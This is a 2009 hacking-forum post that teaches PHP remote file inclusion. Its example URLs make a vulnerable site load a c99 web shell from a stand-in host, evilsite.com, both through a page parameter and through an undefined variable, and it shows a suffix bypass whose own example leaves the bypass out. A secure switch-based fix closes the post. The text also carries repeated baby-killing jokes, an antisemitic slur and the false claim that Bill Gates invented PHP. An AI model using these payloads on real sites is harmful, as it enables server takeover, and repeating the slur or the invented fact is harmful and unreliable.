Multi Ethnic Hacking Group


    RFI Tutorial (remote file inclusion)

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    RFI Tutorial (remote file inclusion)

    Post by Foxi on Wed Jul 08, 2009 4:14 am

    Basically, the include function in PHP allows contents from local or remote files to be pretty much "copied and pasted" and executed in a script at runtime.

    Now suppose yo' dad wants a small website. All he wants is three pages.
    A blog page where he can update you on how many babies he has killed.
    A contact page with his email on it os people can ask advice on the best way to kill babies.
    An gallery page where he can show you pictures of all the babies he has killed.

    He creates four pages. blog.php, contact.php and gallery.php along with index.php, this is our "main" page that will contain a header, a side bar for navigation, some php and a footer.

    You would view the pages on his website like this.


    Code:
    http://www.yodad.com/index.php?page=blog.php
    http://www.yodad.com/index.php?page=contact.php
    http://www.yodad.com/index.php?page=gallery.php

    Let's take a look at the code for index.php

    Code:
    //html for header
    //html for menu
    <?php
    $page = $_GET['page'];
    include($page);
    ?>
    //html for footer

    On line 2, $page is set to $_GET['page']

    This means when we go to

    Code:
    http://www.yodad.com/index.php?page=blog.php

    $page is set to blog.php.
    On line 3 it is "included". The contents from blog.php is copied and pasted into index.php

    What's wrong with this? Well as I said earlier the include function can also include remote files. Files NOT on his web server.

    Say we change "blog.php" to "http://www.google.com"
    Code:

    Code:
    http://www.yodad.com/index.php?page=http://www.google.com

    You would see the google home page instead of your dads shitty blog.

    What's the point of this?

    We can include "bad" or "evil" scripts. Some of you may heard of "shells" (r57,c99,g00nshell,peanut). Shells are scripts with functions like letting you view directories of the server it's executed on, deleting files, viewing files, letting you run system commands and more.

    Here's how we would use it:

    Code:
    http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt

    * We have to use the shell as .txt so it's plaintext. If we used .php then the script would be executed on http://www.evilsite.com.

    Let's look at another example of a RFI.

    Undefined variables.

    Say yo' dad has learned how to use MySQL and to put content on his blog page he uses a form he created to connect to his MySQL server and insert his stories into a table.

    To connect to the MySQL server & add content he needs a username & a password. He stores these in a file called "db_details.php".

    The blog.php file needs these credentials to connect and get the content.

    so in index.php:

    Code:
    //html for header
    //html for menu
    <?php
    $database_config_file = "db_details.php";
    $page = $_GET['page'];
    include($page);
    ?>
    //html for footer

    and in blog.php:


    Code:
    <?php
    include($database_config_file);
    //code to connect to MySQL and get the latest blog posts
    ?>

    Since we are calling blog.php through index.php like this:

    Code:
    http://www.yodad.com/index.php?page=blog.php

    , in index.php $database_config_file is set to "db_details.php" and in blog.php it is included. There is no problem there, it then can connect to the MySQL server with the credentials and retrieve his blog content.

    But, if we went to blog.php directly:

    Code:
    http://www.yodad.com/blog.php

    then $database_config_file is not set to anything. It still includes it but it is including nothing. Since we did not use index.php to access it, we did not get: $database_config_file = "db_details.php";

    This is a problem, since we can set it ourselves.
    If we go to

    Code:
    http://www.yodad.com/blog.php?database_config_file=http://evilsite.com/c99.txt

    $database_config_file will be set to http://www.evilsite.com/c99.txt

    Again, blog.php does not check if what it is including is valid.

    ...

    As the famous inventor of PHP, Bill Gates says: There is more than one way to do it.

    There are a few ways to prevent these vulnerabilities.

    Yo' dad thinks he has gotten smart and has put in a method to stop little leet haxors like you.
    This one is easily bypassed.
    index.php:


    Code:
    <?php
    $page = $_GET['page'];
    include($page . ".php");
    ?>

    This means when we go to index.php?page=home it will actually include home.php.

    Omg, dat meanz it wont include my .txt, it will try to include .txt.php Sad.

    Not necessarily. If we put a question mark after the ".txt" then anything that index.php puts after $page will go to the remote script we are including.

    Like this:

    Code:
    http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt

    Index.php would try and include :

    Code:
    http://www.evilsite.com/c99.txt?.php

    To prevent the problem with variables not being defined. Just make sure you define every variable that gets used.


    There are a few other ways to prevent these vulnerabilities involving cleaning the input, checking if files exist etc but since I'm only typing with my big jew nose right now I can't be bothered going through them so I'm going to just do the most practical;

    Switching.


    Code:
    <?php
    $page = $_GET['page'];
    switch($page){
    case "blog":
    include("blog.php");
    break;
    case "contact":
    include("contact.php");
    break;
    case "gallery":
    include("gallery.php");
    break;
    default: //A page wasn't chosen, or one that wasn't "home" or "gallery"
    echo "Choose a page from our fine selection!1!!";
    break;
    }
    ?>

      Current date/time is Sat Sep 23, 2017 9:18 am